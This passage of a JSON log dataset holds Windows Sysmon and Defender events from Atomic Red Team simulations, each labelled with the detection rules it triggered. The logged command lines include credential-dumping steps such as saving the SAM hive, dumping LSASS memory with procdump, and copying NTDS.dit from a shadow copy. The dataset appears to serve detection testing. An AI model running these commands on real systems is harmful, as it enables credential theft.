cmd\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-DA6A-5D31-0000-0010B2953E00","ParentProcessId":5036,"ProcessGuid":"747F3D96-DA6A-5D31-0000-001004983E00","ProcessId":3864,"Product":"Microsoft® Windows® Operating System","RuleName":"Persistence - Scheduled Task Management AT","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:57:46.087"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4083,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:57:46.094355Z"}},"Version":5}}}},{"detection":["Indirect Command Execution"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\system32\\calc.exe\"","Company":"Microsoft Corporation","CurrentDirectory":"c:\\windows\\system32\\","Description":"Windows Calculator","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=F5ED372FD8EC7C455FF66BCE73F16CA51CBC0302,MD5=DEAD69D07BC33B762ABD466FB6F53E11,SHA256=3091E2ABFB55D05D6284B6C4B058B62C8C28AFC1D883B699E9A2B5482EC6FD51,IMPHASH=8EEAA9499666119D13B3F44ECD77A729","Image":"C:\\Windows\\System32\\calc.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"forfiles /p c:\\windows\\system32 /m notepad.exe /c calc.exe","ParentImage":"C:\\Windows\\System32\\forfiles.exe","ParentProcessGuid":"747F3D96-DA72-5D31-0000-001056513F00","ParentProcessId":3680,"ProcessGuid":"747F3D96-DA72-5D31-0000-0010B1543F00","ProcessId":3160,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:57:54.160"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4101,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:57:54.165319Z"}},"Version":5}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2019-07-19 15:10:52.699","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ProcessGuid":"747F3D96-DD47-5D31-0000-001015874900","ProcessId":5840,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\3ivx11ib\\3ivx11ib.dll","UtcTime":"2019-07-19 15:10:52.699"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":4109,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T15:10:52.700901Z"}},"Version":2}}}},{"detection":["Whoami Execution","Local Accounts Discovery"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\system32\\whoami.exe\" /user","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"whoami - displays logged on user information","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88","Image":"C:\\Windows\\System32\\whoami.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-DD47-5D31-0000-001015874900","ParentProcessId":5840,"ProcessGuid":"747F3D96-DD8B-5D31-0000-001094584A00","ProcessId":5792,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 15:11:07.987"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4110,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T15:11:07.994501Z"}},"Version":5}}}},{"detection":["Godmode Sigma Rule"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg save HKLM\\sam sam\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-DD47-5D31-0000-001015874900","ParentProcessId":5840,"ProcessGuid":"747F3D96-DD95-5D31-0000-001075964A00","ProcessId":7140,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 15:11:17.211"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4117,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T15:11:17.224751Z"}},"Version":5}}}},{"detection":["Godmode Sigma Rule","Usage of Sysinternals Tools","Suspicious Use of Procdump on LSASS","Renamed ProcDump","LSASS Memory Dumping","Suspicious Use of Procdump","Procdump Usage"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"procdump.exe -accepteula -ma lsass.exe lsass_dump.dmp\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-DD47-5D31-0000-001015874900","ParentProcessId":5840,"ProcessGuid":"747F3D96-DD9E-5D31-0000-00106E2C4B00","ProcessId":5488,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 15:11:26.626"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4124,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T15:11:26.642464Z"}},"Version":5}}}},{"detection":["Shadow Copies Creation Using Operating Systems Utilities"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"vssadmin.exe create shadow /for=C:","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Command Line Interface for Microsoft® Volume Shadow Copy Service ","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=AC561205CD59BBCDB158525978FF65BDF17FDC3C,MD5=614B5C4238977130AA2270C8AD58CE6C,SHA256=D7577FB88CCA3169C7931DC0D8EC9A444227DC14F6C71D6D39D86A0C5CAD1976,IMPHASH=C1EDC431CD345F0A0F32019895D13FCE","Image":"C:\\Windows\\System32\\vssadmin.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"vssadmin.exe create shadow /for=C:\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-DD9E-5D31-0000-00100C3F4B00","ParentProcessId":5036,"ProcessGuid":"747F3D96-DD9E-5D31-0000-00105E414B00","ProcessId":6584,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 15:11:26.981"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4129,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T15:11:26.989143Z"}},"Version":5}}}},{"detection":["Copying Sensitive Files with Credential Data"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"copy \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1\\Windows\\NTDS\\NTDS.dit C:\\Extract\\ntds.dit\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-DD47-5D31-0000-001015874900","ParentProcessId":5840,"ProcessGuid":"747F3D96-DD9F-5D31-0000-00101A4A4B00","ProcessId":5772,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 15:11:27.156"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4131,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T15:11:27.169217Z"}},"Version":5}}}},{"detection":["Copying Sensitive Files with Credential Data"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"copy \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1\\Windows\\System32\\config\\SYSTEM C:\\Extract\\VSC_SYSTEM_HIVE\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-DD47-5D31-0000-001015874900","ParentProcessId":5840,"ProcessGuid":"747F3D96-DD9F-5D31-0000-00102D4D4B00","ProcessId":976,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 15:11:27.192"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4132,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T15:11:27.202862Z"}},"Version":5}}}},{"detection":["(Built-in Logic) - Windows Defender Detections"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Action ID":"9","Action Name":"%%887","Additional Actions ID":"0","Additional Actions String":"No additional actions required","Category ID":"8","Category Name":"Trojan","Detection ID":"{511224D4-1EB4-47B9-BC4A-37E21F923FED}","Detection Time":"2019-07-18T20:40:00.580Z","Detection User":"MSEDGEWIN10\\IEUser","Engine Version":"AM: 1.1.16100.4, NIS: 1.1.16100.4","Error Code":"0x00000000","Error Description":"The operation completed successfully. ","Execution ID":"1","Execution Name":"%%813","FWLink":"https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:PowerShell/Powersploit.M&threatid=2147725349&enterprise=0","Origin ID":"1","Origin Name":"%%845","Path":"file:_C:\\AtomicRedTeam\\atomic-red-team-master\\atomics\\T1056\\Get-Keystrokes.ps1","Post Clean Status":"0","Pre Execution Status":"0","Process Name":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","Product Name":"%%827","Product Version":"4.18.1906.3","Remediation User":"","Severity ID":"5","Severity Name":"Severe","Signature Version":"AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 1.297.1333.0","Source ID":"3","Source Name":"%%818","State":"1","Status Code":"1","Status Description":"","Threat ID":"2147725349","Threat Name":"Trojan:PowerShell/Powersploit.M","Type ID":"0","Type Name":"%%822","Unused":"","Unused2":"","Unused3":"","Unused4":"","Unused5":"","Unused6":""},"System":{"Channel":"Microsoft-Windows-Windows Defender/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1116,"EventRecordID":37,"Execution":{"#attributes":{"ProcessID":6024,"ThreadID":5500}},"Keywords":"0x8000000000000000","Level":3,"Opcode":0,"Provider":{"#attributes":{"Guid":"11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78","Name":"Microsoft-Windows-Windows Defender"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":0,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-18T20:40:00.730676Z"}},"Version":0}}}},{"detection":["(Built-in Logic) - Windows Defender Detections"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Action ID":"9","Action Name":"%%887","Additional Actions ID":"0","Additional Actions String":"No additional actions required","Category ID":"8","Category Name":"Trojan","Detection ID":"{8791B1FB-0FE7-412E-B084-524CB5A221F3}","Detection Time":"2019-07-18T20:40:13.775Z","Detection User":"MSEDGEWIN10\\IEUser","Engine Version":"AM: 1.1.16100.4, NIS: 1.1.16100.4","Error Code":"0x00000000","Error Description":"The operation completed successfully. ","Execution ID":"1","Execution Name":"%%813","FWLink":"https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:XML/Exeselrun.gen!A&threatid=2147735426&enterprise=0","Origin ID":"1","Origin Name":"%%845","Path":"file:_C:\\AtomicRedTeam\\atomic-red-team-master\\atomics\\T1086\\payloads\\test.xsl","Post Clean Status":"0","Pre Execution Status":"0","Process Name":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","Product Name":"%%827","Product Version":"4.18.1906.3","Remediation User":"","Severity ID":"5","Severity Name":"Severe","Signature Version":"AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 1.297.1333.0","Source ID":"3","Source Name":"%%818","State":"1","Status Code":"1","Status Description":"","Threat ID":"2147735426","Threat Name":"Trojan:XML/Exeselrun.gen!A","Type ID":"2","Type Name":"%%823","Unused":"","Unused2":"","Unused3":"","Unused4":"","Unused5":"","Unused6":""},"System":{"Channel":"Microsoft-Windows-Windows Defender/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1116,"EventRecordID":48,"Execution":{"#attributes":{"ProcessID":6024,"ThreadID":5500}},"Keywords":"0x8000000000000000","Level":3,"Opcode":0,"Provider":{"#attributes":{"Guid":"11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78","Name":"Microsoft-Windows-Windows Defender"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":0,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-18T20:40:16.396422Z"}},"Version":0}}}},{"detection":["(Built-in Logic) - Windows Defender Detections"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Action ID":"9","Action Name":"%%887","Additional Actions ID":"0","Additional Actions String":"No additional actions required","Category ID":"34","Category Name":"Tool","Detection ID":"{37522D93-EBDD-4A5B-93B6-E984C9E3FD38}","Detection Time":"2019-07-18T20:40:16.697Z","Detection User":"MSEDGEWIN10\\IEUser","Engine Version":"AM: 1.1.16100.4, NIS: 1.1.16100.4","Error Code":"0x00000000","Error Description":"The operation completed successfully. ","Execution ID":"1","Execution Name":"%%813","FWLink":"https://go.microsoft.com/fwlink/?linkid=37020&name=HackTool:JS/Jsprat&threatid=2147708292&enterprise=0","Origin ID":"1","Origin Name":"%%845","Path":"file:_C:\\AtomicRedTeam\\atomic-red-team-master\\atomics\\T1100\\shells\\b.jsp->(SCRIPT0005)","Post Clean Status":"0","Pre Execution Status":"0","Process Name":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","Product Name":"%%827","Product Version":"4.18.1906.3","Remediation User":"","Severity ID":"4","Severity Name":"High","Signature Version":"AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 1.297.1333.0","Source ID":"3","Source Name":"%%818","State":"1","Status Code":"1","Status Description":"","Threat ID":"2147708292","Threat Name":"HackTool:JS/Jsprat","Type ID":"8","Type Name":"%%862","Unused":"","Unused2":"","Unused3":"","Unused4":"","Unused5":"","Unused6":""},"System":{"Channel":"Microsoft-Windows-Windows Defender/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1116,"EventRecordID":75,"Execution":{"#attributes":{"ProcessID":6024,"ThreadID":5500}},"Keywords":"0x8000000000000000","Level":3,"Opcode":0,"Provider":{"#attributes":{"Guid":"11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78","Name":"Microsoft-Windows-Windows Defender"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":0,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-18T20:41:16.418508Z"}},"Version":0}}}},{"detection":["(Built-in Logic) - Windows Defender Detections"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Action ID":"9","Action Name":"%%887","Additional Actions ID":"0","Additional Actions String":"No additional actions required","Category ID":"6","Category Name":"Backdoor","Detection ID":"{CEF4D8DA-15D6-4667-8E4C-12D19AB4EFED}","Detection Time":"2019-07-18T20:40:18.385Z","Detection User":"MSEDGEWIN10\\IEUser","Engine Version":"AM: 1.1.16100.4, NIS: 1.1.16100.4","Error Code":"0x00000000","Error Description":"The operation completed successfully. ","Execution ID":"1","Execution Name":"%%813","FWLink":"https://go.microsoft.com/fwlink/?linkid=37020&name=Backdoor:ASP/Ace.T&threatid=2147683177&enterprise=0","Origin ID":"1","Origin Name":"%%845","Path":"file:_C:\\AtomicRedTeam\\atomic-red-team-master\\atomics\\T1100\\shells\\cmd.aspx","Post Clean Status":"0","Pre Execution Status":"0","Process Name":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","Product Name":"%%827","Product Version":"4.18.1906.3","Remediation User":"","Severity ID":"5","Severity Name":"Severe","Signature Version":"AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 1.297.1333.0","Source ID":"3","Source Name":"%%818","State":"1","Status Code":"1","Status Description":"","Threat ID":"2147683177","Threat Name":"Backdoor:ASP/Ace.T","Type ID":"0","Type Name":"%%822","Unused":"","Unused2":"","Unused3":"","Unused4":"","Unused5":"","Unused6":""},"System":{"Channel":"Microsoft-Windows-Windows Defender/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1116,"EventRecordID":76,"Execution":{"#attributes":{"ProcessID":6024,"ThreadID":5500}},"Keywords":"0x8000000000000000","Level":3,"Opcode":0,"Provider":{"#attributes":{"Guid":"11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78","Name":"Microsoft-Windows-Windows Defender"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":0,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-18T20:41:17.508276Z"}},"Version":0}}}},{"detection":["(Built-in Logic) - Windows Defender Detections"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Action ID":"9","Action Name":"%%887","Additional Actions ID":"0","Additional Actions String":"No additional actions required","Category ID":"8","Category Name":"Trojan","Detection ID":"{F6272F78-9FD1-47D2-B206-89E0F0DCBDB9}","Detection Time":"2019-07-18T20:41:40.357Z","Detection User":"MSEDGEWIN10\\IEUser","Engine Version":"AM: 1.1.16100.4, NIS: 0.0.0.0","Error Code":"0x00000000","Error Description":"The operation completed successfully. ","Execution ID":"1","Execution Name":"%%813","FWLink":"https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Sehyioa.A!cl&threatid=2147726426&enterprise=0","Origin ID":"1","Origin Name":"%%845","Path":"file:_C:\\AtomicRedTeam\\atomic-red-team-master\\atomics\\T1218\\src\\Win32\\T1218-2.dll","Post Clean Status":"0","Pre Execution Status":"0","Process Name":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","Product Name":"%%827","Product Version":"4.18.1906.3","Remediation User":"","Severity ID":"5","Severity Name":"Severe","Signature Version":"AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 0.0.0.0","Source ID":"3","Source Name":"%%818","State":"1","Status Code":"1","Status Description":"","Threat ID":"2147726426","Threat Name":"Trojan:Win32/Sehyioa.A!cl","Type ID":"8","Type Name":"%%862","Unused":"","Unused2":"","Unused3":"","Unused4":"","Unused5":"","Unused6":""},"System":{"Channel":"Microsoft-Windows-Windows Defender/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1116,"EventRecordID":95,"Execution":{"#attributes":{"ProcessID":6024,"ThreadID":5500}},"Keywords":"0x8000000000000000","Level":3,"Opcode":0,"Provider":{"#attributes":{"Guid":"11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78","Name":"Microsoft-Windows-Windows Defender"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":0,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-18T20:41:48.236136Z"}},"Version":0}}}},{"detection":["(Built-in Logic) - Windows Defender Detections"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Action ID":"9","Action Name":"%%887","Additional Actions ID":"0","Additional Actions String":"No additional actions required","Category ID":"34","Category Name":"Tool","Detection ID":"{37522D93-EBDD-4A5B-93B6-E984C9E3FD38}","Detection Time":"2019-07-18T20:40:16.697Z","Detection User":"MSEDGEWIN10\\IEUser","Engine Version":"AM: 1.1.16100.4, NIS: 0.0.0.0","Error Code":"0x00000000","Error Description":"The operation completed successfully. ","Execution ID":"1","Execution Name":"%%813","FWLink":"https://go.microsoft.com/fwlink/?linkid=37020&name=HackTool:JS/Jsprat&threatid=2147708292&enterprise=0","Origin ID":"1","Origin Name":"%%845","Path":"containerfile:_C:\\AtomicRedTeam\\atomic-red-team-master\\atomics\\T1100\\shells\\b.jsp; file:_C:\\AtomicRedTeam\\atomic-red-team-master\\atomics\\T1100\\shells\\b.jsp->(SCRIPT0005); file:_C:\\AtomicRedTeam\\atomic-red-team-master\\atomics\\T1100\\shells\\b.jsp->(SCRIPT0037); file:_C:\\AtomicRedTeam\\atomic-red-team-master\\atomics\\T1100\\shells\\b.jsp->(SCRIPT0045); file:_C:\\AtomicRedTeam\\atomic-red-team-master\\atomics\\T1100\\shells\\b.jsp->(SCRIPT0065); file:_C:\\AtomicRedTeam\\atomic-red-team-master\\atomics\\T1100\\shells\\b.jsp->(SCRIPT0068)","Post Clean Status":"0","Pre Execution Status":"0","Process Name":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","Product Name":"%%827","Product Version":"4.18.1906.3","Remediation User":"","Severity ID":"4","Severity Name":"High","Signature Version":"AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 0.0.0.0","Source ID":"3","Source Name":"%%818","State":"1","Status Code":"1","Status Description":"","Threat ID":"2147708292","Threat Name":"HackTool:JS/Jsprat","Type ID":"8","Type Name":"%%862","Unused":"","Unused2":"","Unused3":"","Unused4":"","Unused5":"","Unused6":""},"System":{"Channel":"Microsoft-Windows-Windows Defender/Operational","Computer":"MSEDGEWIN10","Correlation":{"#attributes":{"ActivityID":"40013F0F-EF76-4940-A8B2-4DE50BE9AAC3"}},"EventID":1116,"EventRecordID":102,"Execution":{"#attributes":{"ProcessID":6024,"ThreadID":6068}},"Keywords":"0x8000000000000000","Level":3,"Opcode":0,"Provider":{"#attributes":{"Guid":"11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78","Name":"Microsoft-Windows-Windows Defender"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":0,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-18T20:51:50.798994Z"}},"Version":0}}}},{"detection":["Godmode Sigma Rule","OceanLotus Registry Activity","UAC Bypass via Event Viewer","New RUN Key Pointing to Suspicious Folder","Execution from Suspicious Folder","Suspicious Program Location with Network 